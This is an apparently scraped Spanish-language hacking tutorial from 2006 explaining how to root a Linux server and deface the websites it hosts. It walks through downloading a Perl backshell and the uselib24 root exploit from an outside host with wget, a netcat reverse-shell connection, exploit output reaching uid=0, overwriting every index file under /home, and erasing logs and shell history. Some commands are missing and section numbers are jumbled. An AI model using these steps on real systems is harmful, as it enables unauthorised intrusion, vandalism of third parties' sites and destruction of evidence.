Académique Documents
Professionnel Documents
Culture Documents
un Mass Defacement.
*****9/10/2006******
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~INDICE~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1-# Introdución
2-# Explicación de Permisos
3-# Acomodando Backshell en el Server
4-# Poniendo a la Escucha NetCat
5-# Onteniendo Informacion del Server
7-# Dar permisos y Ejecutar el Binario (r00texploit)
8-# Haciendo el Mass Defacement
9-# Borrando log's
10-# Despedida
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~
1-# Introdución
~~~~~~~~~~~~~~
Hola Amigos!
En este tutorial les voy a explicar como conseguir acesso r00t en un server LinuX.
Tambien se explicara como hacer el mass defacement, borrar logs y algun par de cosas
mas.
Espero ke les guste ;=)
~~~~~~~~~~~~~~~~~~~~~~~~~~~
2-# Explicación de Permisos
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cuando tenemos haceso a un Server con una shell, nos fijamos que al lado de cada
archivo o carpeta nos salen estas letras:
(R) Lectura
(W) Escritura
(x) Ejecutación
(d) Directorio
(-) No tenemos
Cuando estes en netcat y pulses ls para ver los archivos y directorios ke hay, no les
saldran
los permisos que tene cada carpeta para verlos, en vez de solo poner ls, le añadimos -la
Ejemplo:
ls -la
Weno pues hay se les kitaron las dudas, ya saben lo que significa cada letra :D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3-# Acomodando Backshell en el Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ahora subimos una backshell como la datach0s o la in que son backshells en perl.
Este tuto lo guiare con la datacha0s.
La subiremos en el directorio /tmp/ que es un directorio donde se guardan archivos
temporales
y en un 99% de los servers tendremos permisos de escritura :D
cd /tmp/;wget usuarios.lycos.es/teamzer0/backdoors/dc.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
4-# Poniendo a la Escucha NetCat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Una vez subida la dc.pl, dejamos el netcat en nuestro PC a la escucha, en este caso
dejaremos a la escucha el puerto 9000 poniendo lo siguiente:
-lvvp 9000
Ejemplo:
perl dc.pl 10.0.1.251 9000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5-# Onteniendo Informacion del Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ponemos en el netcat:
pwd;uname -a
/tmp
Linux server.corpoweb.com 2.4.20-021stab028.24.777-enterprise #1 SMP Fri Jan 6
9:39:27 MSK 2006 i686 athlon i386 GNU/Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
7-# Dar permisos y Ejecutar el Binario (r00texploit)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wget usuarios.lycos.es/teamzer0/rootexploits/uselib24
Cuando este subido le damos permisos 777 (Lectura, escritura, ejecutacion) de esta
forma:
Y una vez que se le de permisos 777 nos saldra un mensaje como este:
./binario
En este momento:
./uselib24
# SLAB cleanup
child 1 VMAs 15599
# moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
# vmalloc area 0xdf000000 - 0xfdea2000
Wait... -
# race won maps=23890
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xe0166000
# gate modified ( 0xffec958b 0x0804ec00 )
# exploited, uid=0
Ahora ponemos id y:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
8-# Haciendo el Mass Defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Weno ya que somos r00t y es nuestro el server xD vamos a dejar a las webs
que aloja un index xD.
Lo subimos asi:
wget urldenuestraweb.com/index.html
Una vez que nos busque el archivo nos saldra en pantalla su directorio,
ahora para ver lo ke hay dentro utilizaremos el comando cat.
Ejemplo:
Hay nos saldran las webs alojadas en el server y tambien mucha info que no nos
interesa, asi que para sacar solo las webs, ponemos:
Sino encuentran el archivo ese, tb pueden buscar las carpetas /www/ y /sites/
en el server, esas muchas veces tambien suelen traer hay las webs ;)
3º- Ahora buscaremos todos los index.* del server y los sustituiremos
por el nuestro con este comando:
Hay hemos puesto que busque los index.* en /home/ (Si saben que estan las webs
alojadas
en otro directorio lo cambian y listo) y ke les sustituya por el index nuestro que tenemos
subido en /tmp/. Aqui dejenlo buen rato si hay varias webs y vayan a tomarse algo ;)
Una vez que este esto, ya deberian en las webs nuestro index :D
~~~~~~~~~~~~~~~~~~~
8-# Borrando Log's
~~~~~~~~~~~~~~~~~~~
http://usuarios.lycos.es/teamzer0/log.pl
La subimos asi:
wget usuarios.lycos.es/teamzer0/log.pl
perl log.pl
Se ejecutara la tool y empezara a buscar logs y archivos que registran lo que izimos.
La tool puede ke tarde un poco en buscarles y borrarles, pero kederaba bien :D
cd /;rm .bash_history
cd /;rm .bash_logut
unset HISTFILE
~~~~~~~~~~~~~~~
10-# Despedida
~~~~~~~~~~~~~~~
Weno aqui ya acaba el tutorial, espero que muchos aprendan con este tutorial
y que algunos resuelvan algunas dudas que tenian en la cabeza ;)
Cualquier duda que tengan o comentarios envienlo a mi correo y lo
antes posible intentare resolversela.